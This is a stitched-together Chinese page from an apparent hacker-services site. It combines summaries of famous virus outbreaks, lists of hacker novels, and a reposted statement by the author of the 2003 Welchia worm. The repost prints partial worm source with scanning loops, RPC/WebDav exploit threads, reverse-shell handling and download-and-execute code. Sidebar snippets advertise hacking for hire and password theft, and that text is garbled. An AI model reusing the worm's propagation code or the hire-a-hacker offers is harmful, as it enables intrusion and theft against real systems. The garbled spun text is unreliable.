当前位置:首页 > 黑客业务 > 正文内容

超裂都市黑客冲击波的简单介绍

hacker2年前 (2022-07-20)黑客业务67

本文目录一览:

全球最为严重的黑客入侵事件有哪几起?

世界上自从电脑普及之后,就发生了很多黑客入侵的事件,下面介绍几种危害比较大,范围传播比较广的病毒。

一、“梅利莎病毒”事件

1998年,大卫L史密斯运用Word软件里的宏运算编写了一个电脑病毒,这种病毒是通过微软的Outlook传播的。史密斯把它命名为梅丽莎,一位舞女的名字。一旦收件人打开邮件,病毒就会自动向50位好友复制发送同样的邮件。史密斯把它放在网络上之后,这种病毒开始迅速传播。直到1999年3月,梅利莎登上了全球报纸的头版。据当时统计梅利莎感染了全球15%~20%的商用PC。还迫使Outlook终止了服务,直到病毒被消灭。而史密斯也被判20个月的监禁,同时被处5000美元罚款。这也是第一个引起全球社会关注的电脑病毒。

二、“冲击波病毒”事件

冲击波病毒是利用在2003年7月21日公布的RPC漏洞进行传播的,该病毒于当年8月爆发。它会使系统操作异常、不停重启、甚至导致系统崩溃。另外该病毒还有很强的自我防卫能力,它还会对微软的一个升级网站进行拒绝服务攻击,导致该网站堵塞,使用户无法通过该网站升级系统。使电脑丧失更新该漏洞补丁的能力。而这一病毒的制造者居然只是个18岁的少年,这个名叫杰弗里·李·帕森的少年最后被判处18个月徒刑。这个病毒的变种至今仍有存活,小心中招哦。

三、“爱虫病毒”事件

爱虫跟梅利莎类似也是通过Outlook电子邮件系统传播,不过邮件主题变为了“I LoveYou”,打开病毒附件后,就会自动传播。该病毒在很短的时间内就袭击了全球无以数计的电脑,并且,它还是个很挑食的病毒,专喜欢那些具有高价值IT资源的电脑系统。“爱虫”病毒是迄今为止发现的传染速度最快而且传染面积最广的计算机病毒。

四、“震荡波病毒”事件

震荡波于2004年4月30日爆发,短短的时间内就给全球造成了数千万美元的损失,也让所有人记住了04年的4月。电脑一旦中招就会莫名其妙地死机或重新启动计算机;而在纯DOS环境下执行病毒文件,则会显示出谴责美国大兵的英文语句。

五、“MyDoom病毒”事件

MyDoom是一种通过电子邮件附件和网络Kazaa传播的病毒。在2004年1月28日爆发,在高峰时期,导致网络加载时间减慢50%以上。它会自动生成病毒文件,修改注册表,通过电子邮件进行传播。芬兰的一家安全软件和服务公司甚至将其称为病毒历史上最厉害的电子邮件蠕虫。据估计,这个病毒的传播占爆发当日全球电子邮件通信量的20%至30%,全球有40万至50万台电脑受到了感染。

六、美国1.3亿张信用卡信息被盗事件

28岁的美国迈阿密人冈萨雷斯从2006年10月开始到2008年1月期间,利用黑客技术突破电脑防火墙,侵入5家大公司的电脑系统,盗取大约1.3亿张信用卡的账户信息。造成了美国迄今起诉的最大身份信息盗窃案,也直接导致支付服务巨头Heartland向Visa、万事达卡、美国运通以及其他信用卡公司支付超过1.1亿美元的相关赔款。2010年3月,冈萨雷斯被判两个并行的20年刑期,这是美国史上对计算机犯罪判罚刑期最长的一次。正因为这次事件冈萨雷斯被称为美国史上最大的黑客。

七、索尼影业遭袭事件

2014年11月24日,黑客组织“和平卫士”公布索尼影业员工电邮,涉及公司高管薪酬和索尼非发行电影拷贝等内容。据估计此次行动与即将上映的电影《采访》有关。虽然索尼影业最终决定取消影片的发行。但在此次袭击事件发生数月后,其影响依然在持续发酵,电脑故障频发,电邮持续被冻结等。因涉及到诸多影视界明星及各界名人,该公司联席董事长被迫引咎辞职。

八、“熊猫烧香病毒”事件

为什么把熊猫烧香病毒放在最后呢,因为对熊猫烧香病毒体会最深,相信在2006年-2007年初玩电脑的人都会记得一个名为“熊猫烧香”的病毒,2007年1月初开始肆虐网络,它主要通过下载的档案传染,受到感染的机器文件因为被误携带间接对其它 计算机程序、系统破坏严重。在短短的两个多月时间,该病毒不断入侵个人电脑,给上百万个人用户、网吧及企业局域网用户带来无法估量的损失。不过,熊猫烧香作者只为炫技,并没有像比特病毒一样为了要钱。2007年9月24日,“熊猫烧香”案一审宣判,主犯李俊被判刑4年。

求推荐都市黑客小说

1.指间的黑客

2.黑客传说

3.原始动力

4.禁区之门(地狱黑客)

5.颠峰黑客

6.心灵黑客

7.黑客江湖

8.网络骑士

9.黑客的心

10.黑客风云

11.天擎

12.数字生命

13.白手起家

14.黑客反击战

15.程序员法则

16.红色黑客

17.我用电脑黑了全世界

18.网神-黑客启示录

19.骇世黑客

20.我是一个黑客

21.首席黑客

22.网络特级追杀令

23.校园网络黑客之剑心传

24.谁动了你的密码

25..黑客之少年的成长

26.超级黑客

27.极品黑客

28.黑客之王

29.极光骇客

30.黑客天堂

31.我的黑客女友

32.未来黑客

33.黑客界的耻辱——剽窃之王

34.疯狂的程序员

35.再世黑客

36.终极黑客

37.超级系统

求黑客类小说,主角是顶级黑客,最好有什么高科技的东西,类似人工智能啊,机器人的

疯狂的硬盘

黑客江湖

原始动力

黑客传奇

巅峰黑客

最强黑客

历史的尘埃

高手寂寞

燕归来熙

间客 指间的黑客

天擎

黑客江湖

禁区之门

超级系统

黑客,作者:青幕山

个人最爱的是红客、小说绘上连载奇露亚的《禁区法则》、

《冲击波杀手》那个黑客是谁?

这个问题警察也想知道 也没人在网上公布

给您转一篇文章 也许对您有用

冲击波杀手的作者网上现身

前言:“冲击波”蠕虫爆发后,大量个人主机及服务器遭受侵袭,各大安全公司,杀毒厂商纷纷推出各种解决方案,不料短短几日内,又出现了来历不明的新蠕虫,经过一些安全专家的反向编译和分析,惊讶的发现,该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁,而且该蠕虫还具有定时自毁功能,显然作者的目标还是有一定的善意因素,但是蠕虫毕竟是蠕虫,因为大量icmp包的发送,还是能够给企业局域网络带来极大的压力,就此,对蠕虫的危害性依然要保持极大的关注和警惕,相关文章可以参见

8月20日,蠕虫作者突然现身,出现在某安全论坛,以下是该作者论坛上声明的转载,并公开了源代码。

下文为作者自述-转自某安全论坛

玩过了~~ 虫虫四个小时之内已经完成了任务~~~ 不得不写这豆腐块~~~

char *szMe = "=========== I love my wife baby ~~~ Welcome Chian~~~

Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins";

偶:小地方小公司小小程序员

偶从不玩安全的,临时抱佛脚,看了些资料,仓促写了这个烂虫虫~~~

A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ,虽然偶临时玩安全的即兴之作亦很烂

~~~

B 看不惯国内某几家放毒公司的商业炒作,发网难财,违背良心,误导民众

偶就帮你丫的除光了虫虫,打光了补丁,没想到他丫的误导的更变态~~~ 你丫的方脑壳

~~

C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~

D VirusBOy 兄,baby 可不是情人吆,偶家小子两岁就开始跟偶抢机器了~~

E 长了这么大,算首次报效社会吧~~~

F 几年?进去就是了,不就是个坐吗, 切~~~ 偶是吓大的!

======================================================

0 chian 系 china 笔误~~ 敲的快了,某个指头先到~~~

1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~

2 RpcDcom WebDav 使用同一 反向shellcode, 用 eyas的, lion修改

(声明:谁也没给偶,偶从一被人遗忘的公开程序中sniffer的,谢两位)

此shellcode 新进程建在svchost下,就一个Call Ebx 通杀了 all 2k xp

他丫的,还有放毒公司言导致xp机器重启云云的~~~

3 Bill该死 有 Tftpd.exe, 干吗不用,虽然偶看过 Tftp 协议,练习写过~~~

4 某年某月某日某时某刻,

溜出国门,辗转借了几台 Xeon™ 4 cpus, 2g memory 机器

架起 2000 线程的 WebDav 投放玩具,对准某国骨干的几个B段

10 分钟内投放了三四百个种子(早知道有这么多,就换个玩法 ~~~

5 发icmp包是为了提高搜索效率,算唯一的危害了~~~ 刺激一下也好~~~

打补丁的虫,杀虫的虫,再不有点儿小危害就丢尽了虫虫家族的脸~~~

//偶婆婆, 烂代码~~~ 将就看吧~~~

BOOL DoServicePackFunction()

{

DWORD nSystemVer = Win2000OrXp();

if ( !( nSystemVer == 0 || nSystemVer == 1) )

return FALSE; // not 2k or xp

if ( ReadRegServicePack(nSystemVer) )

return FALSE; //已经安装了

//识别语言版本

int nLanguageID;

unsigned int unOemCP = GetOEMCP();

LCID lcid = GetSystemDefaultLCID();

WORD wMain = PRIMARYLANGID(lcid);

WORD wSub = SUBLANGID(lcid);

if ( unOemCP == 437 wMain == 9 wSub == 1 ) //en

nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~

//管不了小欧洲~~ 俄罗斯牛人有自己的玩法

~~

else if ( unOemCP == 936 wMain == 4 wSub == 2 ) //cn

nLanguageID = 1; //就是为这个来的~~

else if ( unOemCP == 950 wMain == 4 wSub == 1 ) //tw

nLanguageID = 2; //同胞骨肉的忙,一定要帮~~

else if ( unOemCP == 932 wMain == 0x11 wSub == 1 ) //jp

nLanguageID = -1; //偶好有干掉鬼子机器的冲动!

//罢了,冤冤相报何时了~~~ 希望他丫的自新

~~~ 再玩火就灭了他丫的~~

else if ( unOemCP == 949 wMain == 0x12 wSub == 1 ) //kr

nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~

else{

nLanguageID = -1;

}

if ( nLanguageID == -1)

return FALSE;

char szServicePack[] = "RpcServicePack.exe";

// downlaod it~~~

if ( !nSystemVer ) { // 2k

if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )

return FALSE;

}

else{

if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )

return FALSE;

}

char szExec[180];

sprintf(szExec, "%s -n -o -z -q", szServicePack);

HANDLE hProcess = MakeProcess( szExec );

if ( hProcess == NULL )

return FALSE;

if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内

未完成

TerminateProcess(hProcess,1);

CloseHandle(hProcess);

DeleteFile(szServicePack);

return FALSE;

}

CloseHandle(hProcess);

Sleep(15000);

DeleteFile(szServicePack);

if ( ReadRegServicePack(nSystemVer) ) {

ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot

it~~~

Sleep(20000); //说偶重启有过? 不重启补丁无效,

找 Bill该死 说去~~~

}

return TRUE;

}

// IN: 始ip, B段数量, 是否随机,是否换WebDav //更烂~~~ 凑合着看~~~

void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL

bWebDav)

{

HANDLE hThread = NULL;

BOOL bFirst = TRUE;

u_long uComp;

for (int i=0;i (nBCount * 256 * 256); i++){

if ( bRand )

uComp = MakeRandIp();

else

uComp = i + ulIpStart;

if ( //还是屏蔽掉部分目标,免得目标中招后,再玩就把下一代干掉了,不破坏的好

~~~

(BYTE)uComp == 0xc5 ||

(BYTE)(uComp8) == 0xc5 ||

(BYTE)(uComp16) == 0xc5 ||

(BYTE)(uComp24) == 0xc5 ||

(WORD)uComp == 0x9999 ||

(WORD)(uComp8) == 0x9999 ||

(WORD)(uComp16) == 0x9999 )

continue;

u_long *myPara = new u_long;

if ( myPara == NULL ){//如果分配失败,再尝试一次

Sleep(100);

myPara = new u_long;

}

if ( myPara ){

if ( hThread )

CloseHandle(hThread);

*myPara = htonl( uComp);

DWORD dwThreadId;

if (bWebDav)

hThread =

CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,dwThreadId);

else

hThread =

CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,dwThreadId);

Sleep(2);

}

//添加此处代码,避免首次执行时,线程中的

InterlockedIncrement(g_CurThreadCount) 未来得及运行,一次性建立了N个线程的

bug!

if ( bFirst (i = nMaxThread) ){

Sleep(2000);

bFirst = FALSE;

}

while(g_CurThreadCount = nMaxThread) // #define nMaxThread 300 ,不小心,

玩过了~~~

Sleep(2);

}

Sleep(60000);

}

//服务模式和控制台模式公用主程序

void DoIt()

{

WSADATAwsd;

if(WSAStartup(MAKEWORD(2,2),wsd)!=0)

return;

//杀蠕虫

KillMsblast();

//卸载

SYSTEMTIME st;

GetLocalTime(st);

if ( st.wYear == 2004 ){

MyDeleteService(szServiceName);

MyDeleteService(szServiceTftpd);

RemoveMe();

ExitProcess(1); //其实不必,RemoveMe()中借用了前辈的代码,2k下,退出程序时将

自身文件删除了

}

srand( GetTickCount() );

memset(pPingBuffer, '\xAA', sizeof(pPingBuffer));

//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补

丁已经打够了!~~~

//准备WebDav发送缓冲区

do{

pWebDavExploitBuffer = new char[68000];

Sleep(100);

}while(pWebDavExploitBuffer == NULL);

//必须在checkonlien 之前,一次装配好子弹

PressWebDavBufferOnce();

PressRpcDcomBufferOnce();

CheckOnlienAndPressData(); //get LocalIp 修正子弹中的反向ip 和 端口

//打补丁

DoServicePackFunction();

//建立接收线程

DWORD dwThreadID;

HANDLE

hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L

PVOID)NULL,0,dwThreadID);

if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞,有反连,再建线程处理之,

同时处理多个反连

return;

CloseHandle(hWorkThread);

if ( !MyStartService(szServiceTftpd) ){

Sleep(1000);

InstallTftpService();

Sleep(1000);

MyStartService(szServiceTftpd);

}

Sleep(2000); //等待接收线程中的全局 rand bind port

u_long ulIP;

for(;{ //估算了一下,普通机器2小时一循环

//首先扫描本ip段

CheckOnlienAndPressData();

ulIP = ntohl(inet_addr(szLocalIp));

ulIP = 0xffff0000;

BeginExploitFunction( ulIP, 1, 0, 0);

//再扫描本ip前后3个段

CheckOnlienAndPressData();

if ( rand() % 2)

ulIP += 0x00010000;

else

ulIP -= 0x00030000;

BeginExploitFunction( ulIP, 3, 0, 0);

//再扫描WebDav一个段,跳出 135 syn封锁

CheckOnlienAndPressData();

ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,

立即采取补救措施~~~ sorry~~~

BeginExploitFunction( ulIP, 1, 0, 1);

//再扫描随机的IP, 数量1个 B段, rpc or webdav

CheckOnlienAndPressData();

if ( rand() % 2)

BeginExploitFunction( ulIP, 1, 1, 0);

else

BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~

KillMsblast();

}

//WSACleanup();

}

--------------------------------------------------------------------------------------------------

为方便阅读,增加几个补充说明

1.flashsky 创始人之一,启明星辰安全专家,擅长古体诗词,7月中公开rpc漏洞利用方式源代码,公开溢出分析报告,造成全球安全领域的震动,冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。

2.VirusBOy 懂点安全的小朋友,水平不咋地,不过你最好别招惹他,DDOS你一把也够受的。

3.某安全公司安全专家评论,该帖子内容基本属实,蠕虫源代码已经得到确认。

瑞星反病毒检测中心今晚再次截获利用微软RPC漏洞进行传播的病毒。不过,这个新病毒生来就是原冲击波病毒的克星。

瑞星反病毒工程师分析说:该病毒的特点是将“冲击波”(Worm.Blaster)病毒干掉,并在系统内值入,预防冲击波病毒的疫苗。

然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己,消耗大量CPU和网络资源,并且有可能会导致系统死机。该病毒的作者似乎无意作恶,病毒设定在2004年自行毁灭。

由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此瑞星反病毒工程师提醒广大用户,设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。

求几本经典写都市黑客类的完本小说

1.指间的黑客

2.黑客传说

3.原始动力

4.禁区之门(地狱黑客)

5.颠峰黑客

6.心灵黑客

7.黑客江湖

8.网络骑士

9.黑客的心

10.黑客风云

11.天擎

12.数字生命

13.白手起家

14.黑客反击战

15.程序员法则

16.红色黑客

17.我用电脑黑了全世界

18.网神-黑客启示录

19.骇世黑客

20.我是一个黑客

21.首席黑客

22.网络特级追杀令

23.校园网络黑客之剑心传

24.谁动了你的密码

25..黑客之少年的成长

26.超级黑客

27.极品黑客

28.黑客之王

29.极光骇客

30.黑客天堂

31.我的黑客女友

32.未来黑客

33.黑客界的耻辱——剽窃之王

34.疯狂的程序员

35.再世黑客

36.终极黑客

37.超级系统

扫描二维码推送至手机访问。

版权声明:本文由黑客业务发布,如需转载请注明出处。

本文链接:https://e-zmc.com/198113.html

分享给朋友:

“超裂都市黑客冲击波的简单介绍” 的相关文章

点淘春日妆容活动怎么参与?活动有何奖励?

淘欠望频+曲播弄法 去袭!宣布 欠望频介入 #化妆台宝匿公然 ,无机会得到 ≥  五万欠望频流质及≥ 一万曲播间流质!更无机会登上点淘  二0 二 二 营销年夜 IP【点淘会购榜】。投稿开端 空儿: 二0 二 二年 三月 一 六日00:00:00投稿截止空儿: 二0 二 二年 三月 二 五日 二 ...

我的抗战3之铁血轻奇兵

第 一页 剧情吧工夫 : 二0 一 四- 一 二-0 六  一 六: 三 二: 二 一 尔的抗和 三之铁血沉偶兵第 一散剧情先容   乔掌柜送弹药给天高党被汉忠领现    一 九 四 四年,抗日和平靠近 序幕,日军断港绝潢  对于旭日 乡的天高党入止血洗。   乔掌柜负责输送 一批兵器 给天...

支付宝转账被骗找黑客(黑客攻击支付宝视频)

《魂魄 功男父》受到宅男冷捧 奥秘团队赞助 鹏飞姐入军文娱圈 二0 一 六/ 一0/ 四  一 四:0 二: 一 一 做者:W 二-zhuxi…起源 :伊秀文娱网收集 红人腾讯“鹏飞姐”的尾秀《魂魄 功男父》是一部异常 偶幻的片子 ,讲述了实际 版鹏飞姐单重魂魄 的奥妙 小说,该片子 遭到很多 宅男...

黑客网站免费刷qq黄钻,360 黑客软件,黑客怎么盗百度云密码

寄熟兽高领插件的罪用列表Creation Date:  二0 一 九-0 五- 一 六T0 七: 一 二: 三0Zpython 三 arjun.py -u ://api.example.com/endpoint --get 最近 , 三 六0 威胁谍报 中间 宣布 了《寰球高...

怎么找黑客帮忙做事先办事后付款的黑客qq

如许 当地 便依照 孬了一个tp 五的框架了。第两步:入进NGINX容器,经由过程 docker ps审查docker容器的container-id,运用docker exec敕令 入进到容器外部。 一 二 三 四 五 六 七 八ert@ertiaodeMac-mini  ~/develop/en...

专业黑客先做事后付款 靠谱的黑客

情形 一:最初一次提接且已push执止如下敕令 :git co妹妹it --amendgit会挨谢$EDITOR编纂 器,它会添载此次 提接的日记 ,如许 咱们便否以正在下面编纂 ,编纂 后保留 即实现此次的修正 。情形 两:最初一次提接且未push到办事 器执止如下敕令 :git co妹妹it -...

评论列表

只酷同尘
2年前 (2022-07-20)

20.我是一个黑客 21.首席黑客 22.网络特级追杀令 23.校园网络黑客之剑心

语酌吝吻
2年前 (2022-07-20)

ServicePackFunction(); //建立接收线程 DWORD dwThreadID; HANDLE hWorkThread=CreateThread(

莣萳折奉
2年前 (2022-07-20)

------------------------ 为方便阅读,增加几个补充说明 1.flashsky 创始人之一,启明星辰安全专家,擅长古体诗词,7月中公开rpc漏洞利用方式源代码,公开溢出分析报告,造成全球安全领域的震动,冲击波蠕虫的主要传播技术来源于这位高手公开

慵吋柚笑
2年前 (2022-07-20)

l( uComp); DWORD dwThreadId; if (bWebDav) hThread = CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,dwThreadId); else hThread = Creat

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。